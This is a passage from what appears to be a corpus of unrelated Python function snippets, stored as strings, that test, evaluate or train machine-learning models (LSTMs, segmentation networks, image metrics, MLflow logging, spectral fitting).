model.Modality(setup1, 20, 'emg')\n modality2 = model.Modality(setup1, 5, 'kin')\n\n model.Channel(modality1, 'brachoradialis')\n model.Channel(modality1, 'musculus sterno clavicularis')\n model.Channel(modality1, 'musculus rhombideus')\n model.Channel(modality1, 'musculus lattisimus')\n\n model.Channel(modality2, 'Pos-X')\n model.Channel(modality2, 'Pos-Y')\n model.Channel(modality2, 'Pos-Z')\n\n session1 = model.Session(cls.experiment, setup1, s1, 'session1')\n arr = np.column_stack((\n np.tile(\n np.concatenate((\n np.arange(0., 1., 0.1),\n np.arange(1., 0., -0.1)\n )),\n 10\n ),\n np.tile(\n np.concatenate((\n np.arange(10),\n np.arange(10, 0, -1)\n )),\n 10\n ),\n np.tile(\n np.concatenate((\n np.arange(0.0, 0.1, 0.01),\n np.arange(0.1, 0.0, -0.01)\n )),\n 10\n ),\n np.tile(\n np.concatenate((\n np.arange(0.5, 1.5, 0.1),\n np.arange(1.5, 0.5, -0.1)\n )),\n 10\n ),\n ))\n recording1 = model.Recording(session1, modality1, data=arr,\n identifier='emg_recording1')\n\n arr2 = np.column_stack((\n np.sum(np.mean(arr.reshape(-1, 4, 4), axis=1), axis=1),\n np.prod(np.mean(arr.reshape(-1, 4, 4), axis=1), axis=1),\n np.square(np.sum(np.mean(arr.reshape(-1, 4, 4), axis=1), axis=1))\n ))\n recording2 = model.Recording(session1, modality2, data=arr2,\n identifier='kin_recording1')\n for i in range(5):\n model.Trial(recording1, i * 2, 2)\n model.Trial(recording2, i * 2, 2)\n\n session2 = model.Session(cls.experiment, setup1, s2, 'session2')\n arr = np.add(arr, np.random.randn(*arr.shape))\n recording1 = model.Recording(session2, modality1, data=arr,\n identifier='emg_recording2')\n arr2 = np.column_stack((\n np.sin(np.mean(np.sum(arr.reshape(-1, 4, 4), axis=1))),\n np.cos(np.mean(np.sum(arr.reshape(-1, 4, 4), axis=1))),\n np.tan(np.mean(np.sum(arr.reshape(-1, 4, 4), axis=1)))\n ))\n recording2 = model.Recording(session2, modality2, data=arr2,\n identifier='kin_recording2')\n for i in range(5):\n model.Trial(recording1, i * 2, 2)\n model.Trial(recording2, i * 2, 2)", "def test():\n real_clusters, ei = create_clusters()\n real_data, labels, step_nb = create_emitter_comparison_with_cluster(\n real_clusters, ei)\n logger.info(labels)\n\n model = Sequential()\n model.add(LSTM(units=128, input_shape=(2, 50)))\n model.add(Dense(1, activation=\"sigmoid\"))\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=[\n 'accuracy', f1_score_threshold(), precision_threshold(), recall_threshold()])\n model.load_weights(WEIGHTS_DIR+'/my_model_clusters_weights.h5')\n\n to_predict = np.array(real_data)\n predictions = model.predict(to_predict)\n predictions = np.array([k[0] for k in predictions])\n\n labels = np.array(labels)\n thresholdlist = np.arange(50, 2000, 50)\n\n recall_0_list = []\n recall_1_list = []\n precision_0_list = []\n precision_1_list = []\n\n for k in thresholdlist:\n scores, true_predictions, true_labels = prediction_processing(\n predictions, labels, k, step_nb)\n recall_1_list.append(scores[0])\n recall_0_list.append(scores[1])\n precision_1_list.append(scores[2])\n precision_0_list.append(scores[3])\n fig = plt.figure(0)\n ax = fig.add_subplot(2, 1, 1)\n plt.plot(thresholdlist, recall_0_list, 'bo',\n thresholdlist, recall_1_list, 'ro')\n\n ax2 = fig.add_subplot(2, 1, 2)\n\n plt.plot(thresholdlist, precision_0_list, 'bo',\n thresholdlist, precision_1_list, 'ro')\n plt.show()", "def train_test_model_stream():\n train=learning.Train_kmer_clf()\n train.run()\n #with open(os.path.join(cfg.pathtoxp, cfg.xp_name, cfg.id, f'{cfg.model}_CVresults.pkl'), 'rb') as f:\n # dic=pickle.load(f)\n #test=learning.Test_streaming(batchsize=1, kmer_to_index=dic['features'], clf=dic['classifier'])\n test=learning.Test_streaming(batchsize=1, kmer_to_index=train.kmer_to_index, clf=train.cv_clf)\n test.run()", "def main():\r\n datasetrootdir, resultrootdir, modelrootdir, normal, mutant, savebinary, train_params = io_utils.arg_parse(\r\n 'Test LSTM')\r\n tag = normal + '_vs_' + mutant\r\n\r\n normal_dir_name = os.path.join(datasetrootdir, normal)\r\n mutant_dir_name = os.path.join(datasetrootdir, mutant)\r\n\r\n try:\r\n # load data of normal worms\r\n normal_data, normalfile = io_utils.get_data(os.path.join(normal_dir_name, const.featuredir))\r\n # normal_data = io_utils.normalize_list(normal_data, bias=0.1)\r\n # load data of mutant worms\r\n mutant_data, mutantfile = io_utils.get_data(os.path.join(mutant_dir_name, const.featuredir))\r\n # mutant_data = io_utils.normalize_list(mutant_data, bias=0.1)\r\n\r\n normal_data, mutant_data = io_utils.normalize_list(normal_data, mutant_data, bias=0.1)\r\n print('data loaded')\r\n\r\n maxlen = io_utils.get_max_length(normal_data, mutant_data)\r\n print('maxlen: ' + str(maxlen))\r\n split_percentage = 4.0 / 5.0\r\n batch_size = 64\r\n\r\n X_normal_train, X_normal_test = io_utils.splitData_by_random(normal_data, split_percentage)\r\n X_mutant_train, X_mutant_test = io_utils.splitData_by_random(mutant_data, split_percentage)\r\n\r\n F_normal_train, F_normal_test = io_utils.splitData_by_random(normalfile, split_percentage)\r\n F_mutant_train, F_mutant_test = io_utils.splitData_by_random(mutantfile, split_percentage)\r\n\r\n # transform the list to same sequence length\r\n X_normal_test = sequence.pad_sequences(X_normal_test, maxlen=maxlen, dtype='float64', padding='post',\r\n truncating='post')\r\n X_mutant_test = sequence.pad_sequences(X_mutant_test, maxlen=maxlen, dtype='float64', padding='post',\r\n truncating='post')\r\n\r\n # load model\r\n if os.path.exists(lstm.model_path(modelrootdir, tag=tag)):\r\n print('loading model...')\r\n model = load_model(lstm.model_path(modelrootdir, tag=tag))\r\n model.summary()\r\n else:\r\n print('model ' + lstm.model_path(modelrootdir, tag=tag) + ' not found')\r\n return\r\n\r\n test(model, X_normal_test, X_mutant_test, batch_size=batch_size, normal=normal, mutant=mutant,\r\n F_normal_test=F_normal_test, F_mutant_test=F_mutant_test, savedir=os.path.join(resultrootdir, tag))\r\n\r\n # diff(model, normal_data, mutant_data, batch_size, normalfile, mutantfile,\r\n # os.path.join(resultrootdir,tag,normal), os.path.join(resultrootdir,tag,mutant),maxlen)\r\n\r\n # get output of intermediate layer\r\n normal_data = sequence.pad_sequences(normal_data, maxlen=maxlen, dtype='float64', truncating='post',\r\n padding='post')\r\n mutant_data = sequence.pad_sequences(mutant_data, maxlen=maxlen, dtype='float64', truncating='post',\r\n padding='post')\r\n \r\n write_intermediate_output(model, normal_data, mutant_data, batch_size, normalfile, mutantfile,\r\n os.path.join(resultrootdir, tag, normal), os.path.join(resultrootdir, tag, mutant),\r\n timesteps=maxlen, savebinary=savebinary)\r\n\r\n except:\r\n traceback_error = traceback.format_exc()\r\n print('traceback:' + str(traceback_error))\r\n print('[fail]')\r\n sys.exit(1)\r\n\r\n print('[success]')", "def run_all_models(self):\n #self.process_nitrate()\n try:\n sur_df = self.store.get('/said/{}/iv'.format(self.site['id']))\n con_df = self.store.get('/said/{}/qwdata'.format(self.site['id']))\n\n except KeyError:\n print('site {} not found'.format(site['name']))\n\n\n #determine start and end for plots\n start_date, end_date = get_time_limit(sur_df, con_df)\n\n #update start and end according to user\n user_start = self.site.get('start')\n user_end = self.site.get('end')\n\n if user_start:\n start_date = pd.to_datetime(user_start)\n\n if user_end:\n end_date = pd.to_datetime(user_end)\n\n\n #plot_ssc(ssc_model, filename='plots/{}_ssc.png'.format(site['name']),\n # start_date=start_date, end_date=end_date)\n\n #append the model results to summary\n #summary_table= summary_table.append(model_row_summary(ssc_model))\n\n for directory in ['model_data','report']:\n try:\n os.stat(directory)\n except:\n os.mkdir(directory)\n\n #pp_model_list = import pdb; pdb.set_trace()[\n # ['log(PP)',['log(Turb_HACH)']],\n # ['log(PP)',['log(Turb_YSI)']]\n #]\n\n #self.run_model(pp_model_list, 'PP')\n\n no3_model_list = [\n ['Nitrate',['NitrateSurr']],\n ]\n self.run_model(no3_model_list, 'Nitrate')\n\n ssc_model_list = [\n ['log(SSC)',['log(Turb_HACH)']],\n ['log(SSC)',['log(Turb_YSI)']]\n ]\n self.run_model(ssc_model_list, 'SSC')\n\n tp_model_list = [\n ['log(TP)',['log(OrthoP)','log(Turb_HACH)']],\n ['log(TP)',['log(OrthoP)','log(Turb_YSI)']],\n ['log(TP)',['log(Turb_HACH)']],\n ['log(TP)',['log(Turb_YSI)']]\n ]\n self.run_model(tp_model_list, 'TP')\n\n #write ssc model report\n #reportfile = 'report/{}_ssc_report.txt'.format(site['name'])\n #with open(reportfile, 'w') as f:\n # f.write(ssc_model.get_model_report().as_text())\n #summary_table= summary_table.append(model_row_summary(p_model1))\n #summary_table= summary_table.append(model_row_summary(p_model2))\n #plot_model(ssc_model, filename='plots/{}_ssc_model.png'.format(site['name']))\n #plot_phos(p_model1, p_model2, filename='plots/{}_tp.png'.format(site['name']),\n # start_date=start_date, end_date=end_date)\n #plot_model(p_model1, filename='plots/{}_orthoP_model.png'.format(site['name']))\n #\n ## try to plot phosphate\n #try:\n # phos_plot(con_data, sur_data, filename='plots/{}_p.png'.format(site['name']), title=site['name'],\n # return_model=True)\n #except:\n # print('phospate plot didnt work')\n #\n self.summary_table.to_csv('report/{}_model_summary.csv'.format(self.site['name']),\n index=False)", "def slam_segmentation_test(self, net, test_loader, config, num_votes=100, debug=True):\n\n ############\n # Initialize\n ############\n\n # Choose validation smoothing parameter (0 for no smothing, 0.99 for big smoothing)\n test_smooth = 0.5\n last_min = -0.5\n softmax = torch.nn.Softmax(1)\n\n # Number of classes including ignored labels\n nc_tot = test_loader.dataset.num_classes\n nc_model = net.C\n\n # Test saving path\n test_path = None\n report_path = None\n if config.saving:\n test_path = join('test', config.saving_path.split('/')[-1])\n if not exists(test_path):\n makedirs(test_path)\n report_path = join(test_path, 'reports')\n if not exists(report_path):\n makedirs(report_path)\n\n if test_loader.dataset.set == 'validation':\n for folder in ['val_predictions', 'val_probs']:\n if not exists(join(test_path, folder)):\n makedirs(join(test_path, folder))\n else:\n for folder in ['predictions', 'probs']:\n if not exists(join(test_path, folder)):\n makedirs(join(test_path, folder))\n\n # Init validation container\n all_f_preds = []\n all_f_labels = []\n if test_loader.dataset.set == 'validation':\n for i, seq_frames in enumerate(test_loader.dataset.frames):\n all_f_preds.append([np.zeros((0,), dtype=np.int32) for _ in seq_frames])\n all_f_labels.append([np.zeros((0,), dtype=np.int32) for _ in seq_frames])\n\n #####################\n # Network predictions\n #####################\n\n predictions = []\n targets = []\n test_epoch = 0\n\n t = [time.time()]\n last_display = time.time()\n mean_dt = np.zeros(1)\n\n # Start test loop\n while True:\n print('Initialize workers')\n for i, batch in enumerate(test_loader):\n\n # New time\n t = t[-1:]\n t += [time.time()]\n\n if i == 0:\n print('Done in {:.1f}s'.format(t[1] - t[0]))\n\n if 'cuda' in self.device.type:\n batch.to(self.device)\n\n # Forward pass\n outputs = net(batch, config)\n\n # Get probs and labels\n stk_probs = softmax(outputs).cpu().detach().numpy()\n lengths = batch.lengths[0].cpu().numpy()\n f_inds = batch.frame_inds.cpu().numpy()\n r_inds_list = batch.reproj_inds\n r_mask_list = batch.reproj_masks\n labels_list = batch.val_labels\n torch.cuda.synchronize(self.device)\n\n t += [time.time()]\n\n # Get predictions and labels per instance\n # ***************************************\n\n i0 = 0\n for b_i, length in enumerate(lengths):\n\n # Get prediction\n probs = stk_probs[i0:i0 + length]\n proj_inds = r_inds_list[b_i]\n proj_mask = r_mask_list[b_i]\n frame_labels = labels_list[b_i]\n s_ind = f_inds[b_i, 0]\n f_ind = f_inds[b_i, 1]\n\n # Project predictions on the frame points\n proj_probs = probs[proj_inds]\n\n # Safe check if only one point:\n if proj_probs.ndim < 2:\n proj_probs = np.expand_dims(proj_probs, 0)\n\n # Save probs in a binary file (uint8 format for lighter weight)\n seq_name = test_loader.dataset.sequences[s_ind]\n if test_loader.dataset.set == 'validation':\n folder = 'val_probs'\n pred_folder = 'val_predictions'\n else:\n folder = 'probs'\n pred_folder = 'predictions'\n filename = '{:s}_{:07d}.npy'.format(seq_name, f_ind)\n filepath = join(test_path, folder, filename)\n if exists(filepath):\n frame_probs_uint8 = np.load(filepath)\n else:\n frame_probs_uint8 = np.zeros((proj_mask.shape[0], nc_model), dtype=np.uint8)\n frame_probs = frame_probs_uint8[proj_mask, :].astype(np.float32) / 255\n frame_probs = test_smooth * frame_probs + (1 - test_smooth) * proj_probs\n frame_probs_uint8[proj_mask, :] = (frame_probs * 255).astype(np.uint8)\n np.save(filepath, frame_probs_uint8)\n\n # Save some prediction in ply format for visual\n if test_loader.dataset.set == 'validation':\n\n # Insert false columns for ignored labels\n frame_probs_uint8_bis = frame_probs_uint8.copy()\n for l_ind, label_value in enumerate(test_loader.dataset.label_values):\n if label_value in test_loader.dataset.ignored_labels:\n frame_probs_uint8_bis = np.insert(frame_probs_uint8_bis, l_ind, 0, axis=1)\n\n # Predicted labels\n frame_preds = test_loader.dataset.label_values[np.argmax(frame_probs_uint8_bis,\n axis=1)].astype(np.int32)\n\n # Save some of the frame pots\n if f_ind % 20 == 0:\n seq_path = join(test_loader.dataset.path, 'sequences', test_loader.dataset.sequences[s_ind])\n velo_file = join(seq_path, 'velodyne', test_loader.dataset.frames[s_ind][f_ind] + '.bin')\n frame_points = np.fromfile(velo_file, dtype=np.float32)\n frame_points = frame_points.reshape((-1, 4))\n predpath = join(test_path, pred_folder, filename[:-4] + '.ply')\n #pots = test_loader.dataset.f_potentials[s_ind][f_ind]\n pots = np.zeros((0,))\n if pots.shape[0] > 0:\n write_ply(predpath,\n [frame_points[:, :3], frame_labels, frame_preds, pots],\n ['x', 'y', 'z', 'gt', 'pre', 'pots'])\n else:\n write_ply(predpath,\n [frame_points[:, :3], frame_labels, frame_preds],\n ['x', 'y', 'z', 'gt', 'pre'])\n\n # Also Save lbl probabilities\n probpath = join(test_path, folder, filename[:-4] + '_probs.ply')\n lbl_names = [test_loader.dataset.label_to_names[l]\n for l in test_loader.dataset.label_values\n if l not in test_loader.dataset.ignored_labels]\n write_ply(probpath,\n [frame_points[:, :3], frame_probs_uint8],\n ['x', 'y', 'z'] + lbl_names)\n\n # keep frame preds in memory\n all_f_preds[s_ind][f_ind] = frame_preds\n all_f_labels[s_ind][f_ind] = frame_labels\n\n else:\n\n # Save some of the frame preds\n if f_inds[b_i, 1] % 100 == 0:\n\n # Insert false columns for ignored labels\n for l_ind, label_value in enumerate(test_loader.dataset.label_values):\n if label_value in test_loader.dataset.ignored_labels:\n frame_probs_uint8 = np.insert(frame_probs_uint8, l_ind, 0, axis=1)\n\n # Predicted labels\n frame_preds = test_loader.dataset.label_values[np.argmax(frame_probs_uint8,\n axis=1)].astype(np.int32)\n\n # Load points\n seq_path = join(test_loader.dataset.path, 'sequences', test_loader.dataset.sequences[s_ind])\n velo_file = join(seq_path, 'velodyne', test_loader.dataset.frames[s_ind][f_ind] + '.bin')\n frame_points = np.fromfile(velo_file, dtype=np.float32)\n frame_points = frame_points.reshape((-1, 4))\n predpath = join(test_path, pred_folder, filename[:-4] + '.ply')\n #pots = test_loader.dataset.f_potentials[s_ind][f_ind]\n pots = np.zeros((0,))\n if pots.shape[0] > 0:\n write_ply(predpath,\n [frame_points[:, :3], frame_preds, pots],\n ['x', 'y', 'z', 'pre', 'pots'])\n else:\n write_ply(predpath,\n [frame_points[:, :3], frame_preds],\n ['x', 'y', 'z', 'pre'])\n\n # Stack all prediction for this epoch\n i0 += length\n\n # Average timing\n t += [time.time()]\n mean_dt = 0.95 * mean_dt + 0.05 * (np.array(t[1:]) - np.array(t[:-1]))\n\n # Display\n if (t[-1] - last_display) > 1.0:\n last_display = t[-1]\n message = 'e{:03d}-i{:04d} => {:.1f}% (timings : {:4.2f} {:4.2f} {:4.2f}) / pots {:d} => {:.1f}%'\n min_pot = int(torch.floor(torch.min(test_loader.dataset.potentials)))\n pot_num = torch.sum(test_loader.dataset.potentials > min_pot + 0.5).type(torch.int32).item()\n current_num = pot_num + (i + 1 - config.validation_size) * config.val_batch_num\n print(message.format(test_epoch, i,\n 100 * i / config.validation_size,\n 1000 * (mean_dt[0]),\n 1000 * (mean_dt[1]),\n 1000 * (mean_dt[2]),\n min_pot,\n 100.0 * current_num / len(test_loader.dataset.potentials)))\n\n\n # Update minimum od potentials\n new_min = torch.min(test_loader.dataset.potentials)\n print('Test epoch {:d}, end. Min potential = {:.1f}'.format(test_epoch, new_min))\n\n if last_min + 1 < new_min:\n\n # Update last_min\n last_min += 1\n\n if test_loader.dataset.set == 'validation' and last_min % 1 == 0:\n\n #####################################\n # Results on the whole validation set\n #####################################\n\n # Confusions for our subparts of validation set\n Confs = np.zeros((len(predictions), nc_tot, nc_tot), dtype=np.int32)\n for i, (preds, truth) in enumerate(zip(predictions, targets)):\n\n # Confusions\n Confs[i, :, :] = fast_confusion(truth, preds, test_loader.dataset.label_values).astype(np.int32)\n\n\n # Show vote results\n print('\\nCompute confusion')\n\n val_preds = []\n val_labels = []\n t1 = time.time()\n for i, seq_frames in enumerate(test_loader.dataset.frames):\n val_preds += [np.hstack(all_f_preds[i])]\n val_labels += [np.hstack(all_f_labels[i])]\n val_preds = np.hstack(val_preds)\n val_labels = np.hstack(val_labels)\n t2 = time.time()\n C_tot = fast_confusion(val_labels, val_preds, test_loader.dataset.label_values)\n t3 = time.time()\n print(' Stacking time : {:.1f}s'.format(t2 - t1))\n print('Confusion time : {:.1f}s'.format(t3 - t2))\n\n s1 = '\\n'\n for cc in C_tot:\n for c in cc:\n s1 += '{:7.0f} '.format(c)\n s1 += '\\n'\n if debug:\n print(s1)\n\n # Remove ignored labels from confusions\n for l_ind, label_value in reversed(list(enumerate(test_loader.dataset.label_values))):\n if label_value in test_loader.dataset.ignored_labels:\n C_tot = np.delete(C_tot, l_ind, axis=0)\n C_tot = np.delete(C_tot, l_ind, axis=1)\n\n # Objects IoU\n val_IoUs = IoU_from_confusions(C_tot)\n\n # Compute IoUs\n mIoU = np.mean(val_IoUs)\n s2 = '{:5.2f} | '.format(100 * mIoU)\n for IoU in val_IoUs:\n s2 += '{:5.2f} '.format(100 * IoU)\n print(s2 + '\\n')\n\n # Save a report\n report_file = join(report_path, 'report_{:04d}.txt'.format(int(np.floor(last_min))))\n str = 'Report of the confusion and metrics\\n'\n str += '***********************************\\n\\n\\n'\n str += 'Confusion matrix:\\n\\n'\n str += s1\n str += '\\nIoU values:\\n\\n'\n str += s2\n str += '\\n\\n'\n with open(report_file, 'w') as f:\n f.write(str)\n\n test_epoch += 1\n\n # Break when reaching number of desired votes\n if last_min > num_votes:\n break\n\n return", "def test_full(args, model, device): \n test_path = '../data/full/original/'\n generate_path = '../data/full/generate/'\n test_image_num = len([name for name in os.listdir(test_path)\n if os.path.isfile(os.path.join(test_path, name))])\n\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar = 0.0, 0.0, 0.0, 0.0\n ind = 0\n for name in os.listdir(test_path):\n if os.path.isfile(os.path.join(test_path, name)):\n ind += 1\n test_original, test_style, image_height, image_width = load_test_dataset(name)\n x = torch.from_numpy(test_original).float()\n y_real = torch.from_numpy(test_style).float()\n x = x.view(image_height, image_width, config.channels).permute(2, 0, 1).to(device)\n y_real = y_real.view(image_height, image_width, config.channels).permute(2, 0, 1).to(device)\n \n y_fake = model.gen_g(x.view(-1, config.channels, image_height, image_width))\n y_fake = y_fake.view(config.channels, image_height, image_width)\n \n # Calculate PSNR & SSIM scores\n score_psnr += psnr_full(y_fake, y_real)\n \n y_fake_np = y_fake.detach().cpu().numpy().transpose(1, 2, 0)\n y_real_np = y_real.cpu().numpy().transpose(1, 2, 0)\n temp_ssim, _ = compare_ssim(y_fake_np, y_real_np, multichannel=True, gaussian_weights=True, full=True)\n score_ssim_skimage += temp_ssim\n \n temp_ssim, _ = ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5)\n score_ssim_minstar += temp_ssim\n \n score_msssim_minstar += multi_scale_ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5)\n print('PSNR & SSIM scores of {} images are calculated.'.format(ind))\n \n utils.save_image(y_fake, os.path.join(generate_path, '{}-x.jpg'.format(name[:5] + args.model_type)))\n\n score_psnr /= test_image_num\n score_ssim_skimage /= test_image_num\n score_ssim_minstar /= test_image_num\n score_msssim_minstar /= test_image_num\n print('PSNR : {:.4f}, SSIM_skimage : {:.4f}, SSIM_minstar : {:.4f}, SSIM_msssim: {:.4f}'.format(\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar))", "def test_model_found(arguments):\n ...", "def test_model_runs(self):\n batch = _get_vertex_model_batch()\n pred_dist = self.model(batch, is_training=False)\n logits = pred_dist.logits\n with self.session() as sess:\n sess.run(tf.global_variables_initializer())\n vertices_flat = np.random.randint(\n 2**_QUANTIZATION_BITS + 1,\n size=[_BATCH_SIZE, _NUM_INPUT_VERTS * 3 + 1])\n sess.run(logits, {batch['vertices_flat']: vertices_flat})", "def test_067_normalised_loser_only(self):\n\n def create_model_fn(fn_team: str):\n team_stat = Stats.n_sample_stats_for_team(cursor=db_in_cursor,\n team=fn_team,\n last_sample_date=self.model_date,\n n_samples=self.num_samples,\n normalize_by_matches=False)\n return FeatureModel(input_data=team_stat,\n id=team_stat.team_name,\n feature_model_making_fn=lambda stat: (-1 * stat.lost) / stat.played\n )\n\n for match_date in played_home_OR_away_before_dates:\n ####\n #  Build model up to the day before the match\n ####\n self.model_date = match_date - timedelta(days=1)\n self.num_samples = num_matches_in_season\n\n models: {str: FeatureModel} = FeatureModel.create_models_for_all_teams(\n model_making_fn=create_model_fn, entities=teams)\n\n self.persist_models(model_gen_date=self.model_date, model_description=self.shortDescription(), models=models)\n\n self.make_and_store_predictions_for_date(match_date=match_date, models=models)", "def run_tests():\n source1 = TextModel('hilary_speaches')\n source1.add_file('hilary_source_text.txt')\n\n source2 = TextModel('bernie_speaches')\n source2.add_file('bernie_source_text.txt')\n\n new1 = TextModel('trump_speach')\n new1.add_file('trump_text.txt')\n new1.classify(source1, source2)\n\n new2 = TextModel('hilary_test')\n new2.add_file('hilary_test.txt')\n new2.classify(source1, source2)\n\n new3 = TextModel('bernie_test')\n new3.add_file('bernie_test.txt')\n new3.classify(source1, source2)\n\n new4 = TextModel('bill_clinton_test')\n new4.add_file('bill_clinton_source.txt')\n new4.classify(source1, source2)", "def test_classify_spectra2():\n\n import numpy as np\n from crpm.setup_spectra2 import setup_spectra2\n from crpm.dynamics import computecost\n from crpm.gradientdecent import gradientdecent\n from crpm.analyzebinaryclassifier import analyzebinaryclassifier\n\n #init numpy seed\n np.random.seed(40017)\n\n #setup model\n discriminator, data = setup_spectra2()\n\n #partition data (labels on first row)\n nobv = data.shape[1]\n cutoff = 2*nobv//3\n target = data[0, :cutoff]\n train = data[1:, :cutoff]\n vtarget = data[0, cutoff:]\n valid = data[1:, cutoff:]\n\n #analyze untrained discriminator\n pred, icost = computecost(discriminator, valid, vtarget, \"bce\")\n roc, ireport = analyzebinaryclassifier(pred, vtarget)\n if ireport[\"AreaUnderCurve\"]<.5:\n #flip labels\n pred, icost = computecost(discriminator, valid, 1-vtarget, \"bce\")\n roc, ireport = analyzebinaryclassifier(pred, 1-vtarget)\n print(ireport)\n #plotroc(roc)\n\n #train discriminator\n pred, cost, _ = gradientdecent(discriminator, train, target, \"bce\",\n valid, vtarget,\n earlystop=True,\n finetune=7)\n\n #analyze discriminator\n print(\"analyze trained discriminator to iden subtype\")\n pred, cost = computecost(discriminator, valid, vtarget, \"bce\")\n roc, report = analyzebinaryclassifier(pred, vtarget)\n if report[\"AreaUnderCurve\"]<.5:\n #flip labels\n pred, cost = computecost(discriminator, valid, 1-vtarget, \"bce\")\n roc, report = analyzebinaryclassifier(pred, 1-vtarget)\n print(report)\n #plotroc(roc)\n\n #assert discriminator can be trained by binary cross entropy error\n assert icost > cost\n assert report[\"AreaUnderCurve\"] > ireport[\"AreaUnderCurve\"]\n assert report[\"AreaUnderCurve\"] > .8", "def test_01_train(self):\n today = date.today()\n log_file = os.path.join(LOG_DIR, \"{}-train-{}-{}.log\".format(LOG_PREFIX, today.year, today.month))\n if os.path.exists(log_file):\n os.remove(log_file)\n \n ## update the log\n country = 'india'\n date_range = ('2017-11-29', '2019-05-24')\n metric = {'rmse':0.5}\n runtime = \"00:00:01\"\n model_version = 0.1\n model_version_note = \"test model\"\n \n update_train_log(country, date_range, metric, runtime,\n model_version, model_version_note, test=True, prefix=LOG_PREFIX)\n\n self.assertTrue(os.path.exists(log_file))", "def test(model: LightningModule, datamodule: LightningDataModule,\n logger: LightningLoggerBase, name: str = None,\n config: DictConfig = None, path: str = None):\n\n test_dataloader = datamodule.test_dataloader()\n test_result, predictions = test_model(model, model.criterion, test_dataloader)\n logger.log_metrics(format_result(test_result, name))\n predictions.to_csv(f\"{path}/{f'{name}_' if name else ''}preds.csv\", index=False)\n\n if config.get('test'):\n if config.test.get('corruptions'):\n c_config = config.test.corruptions\n\n sum_acc = 0\n for s in c_config.severities:\n for c in c_config.corruptions:\n dataset = SingleCurruptionDataloader(\n datamodule.data_c_test,\n c,\n s,\n c_config.folder_name,\n transform=datamodule.test_transforms,\n dataset_path=c_config.dataset_path)\n\n dataloader = DataLoader(\n dataset=dataset,\n batch_size=datamodule.batch_size,\n num_workers=datamodule.num_workers,\n pin_memory=datamodule.pin_memory,\n shuffle=False,\n )\n\n c_result, c_predictions = test_model(model, model.criterion, dataloader)\n sum_acc += c_result[0]['test/acc']\n logger.log_metrics(format_result(c_result, f'{name}_{c}_{str(s)}' if name else f'{c}_{str(s)}'))\n c_predictions.to_csv(f\"{path}/{f'{name}_' if name else ''}{c}_{str(s)}_preds.csv\", index=False)\n\n acc = sum_acc / (len(c_config.corruptions) * len(c_config.severities))\n logger.log_metrics({f'{name}_c_test/acc' if name else 'c_test/acc': acc})\n\n if config.test.get('ood'):\n ood_datamodule = instantiate(config.ood)\n ood_datamodule.prepare_data()\n ood_datamodule.setup()\n ood_test = ood_datamodule.test_dataloader()\n\n ood_result, ood_predictions = test_model(model, model.criterion, ood_test)\n logger.log_metrics(format_result(ood_result, f'{name}_ood' if name else 'ood'))\n ood_predictions.to_csv(f\"{path}/{f'{name}_' if name else ''}ood_preds.csv\", index=False)\n\n # TODO: return metrics\n return None", "def test_mock_spec():\n\n # try fitting a mock spectrum which you know has a match in the model grid\n lam_obs, flam_obs, ferr_obs, mock_lsf = get_mock_spec()\n\n # read in entire model set\n bc03_all_spec = fits.open(figs_dir + 'all_comp_spectra_bc03_ssp_and_csp_nolsf_noresample.fits')\n\n # prep for fitting\n total_models = 34542 # if ssp + csp\n\n # arrange the model spectra to be compared in a properly shaped numpy array for faster computation\n # first check where the models are\n model_dir = '/Volumes/Bhavins_backup/bc03_models_npy_spectra/m62/'\n # this is if working on the laptop. Then you must be using the external hard drive where the models are saved.\n if not os.path.isdir(model_dir):\n model_dir = home + '/Documents/GALAXEV_BC03/bc03/src/cspout_new/m62/' # this path only exists on firstlight\n if not os.path.isdir(model_dir):\n print \"Model files not found. Exiting...\"\n sys.exit(0)\n\n example_filename_lamgrid = 'bc2003_hr_m62_tauV0_csp_tau100_salp_lamgrid.npy'\n model_lam_grid = np.load(model_dir + example_filename_lamgrid)\n model_comp_spec = np.zeros([total_models, len(model_lam_grid)], dtype=np.float64)\n for j in range(total_models):\n model_comp_spec[j] = bc03_all_spec[j+1].data\n\n # total run time up to now\n print \"All models put in numpy array. Total time taken up to now --\", time.time() - start, \"seconds.\"\n\n # now call the actual fitting function\n mock_redshift_estimate = 1.0 # this behaves like the photo-z\n\n # extend lam_grid to be able to move the lam_grid later \n avg_dlam = old_ref.get_avg_dlam(lam_obs)\n\n lam_low_to_insert = np.arange(5000, lam_obs[0], avg_dlam)\n lam_high_to_append = np.arange(lam_obs[-1] + avg_dlam, 10500, avg_dlam)\n\n resampling_lam_grid = np.insert(lam_obs, obj=0, values=lam_low_to_insert)\n resampling_lam_grid = np.append(resampling_lam_grid, lam_high_to_append)\n\n # call actual fitting function\n do_fitting(flam_obs, ferr_obs, lam_obs, mock_lsf, mock_redshift_estimate, resampling_lam_grid, \\\n model_lam_grid, total_models, model_comp_spec, bc03_all_spec)\n\n # total time\n print \"Total time taken up to now --\", time.time() - start, \"seconds.\"\n sys.exit(0)\n\n return None", "def test_log_model(auto_arima_model, tmp_path, should_start_run, serialization_format):\n try:\n if should_start_run:\n mlflow.start_run()\n artifact_path = \"sktime\"\n conda_env = tmp_path.joinpath(\"conda_env.yaml\")\n _mlflow_conda_env(conda_env, additional_pip_deps=[\"sktime\"])\n model_info = flavor.log_model(\n sktime_model=auto_arima_model,\n artifact_path=artifact_path,\n conda_env=str(conda_env),\n serialization_format=serialization_format,\n )\n model_uri = f\"runs:/{mlflow.active_run().info.run_id}/{artifact_path}\"\n assert model_info.model_uri == model_uri\n reloaded_model = flavor.load_model(\n model_uri=model_uri,\n )\n np.testing.assert_array_equal(auto_arima_model.predict(), reloaded_model.predict())\n model_path = Path(_download_artifact_from_uri(artifact_uri=model_uri))\n model_config = Model.load(str(model_path.joinpath(\"MLmodel\")))\n assert pyfunc.FLAVOR_NAME in model_config.flavors\n finally:\n mlflow.end_run()", "def train_nn_scaled(image, spectra, n_rep=500, n_epochs=30000, lr=1e-3, added_dE1=0.3, path_to_models=\"models\",\n display_step=1000):\n \"\"\"\n if hasattr(image, \"name\"):\n path_to_models = image.name + \"_\" + path_to_models\n\n if not os.path.exists(path_to_models):\n Path(path_to_models).mkdir(parents=True, exist_ok=True)\n else:\n ans = input(\"The directory \" + path_to_models + \" already exists, if there are trained models \" +\n \"in this folder, they will be overwritten. Do you want to continue? \\n\"+\n \"yes [y], no [n], define new path[dp]\\n\")\n if ans[0] == 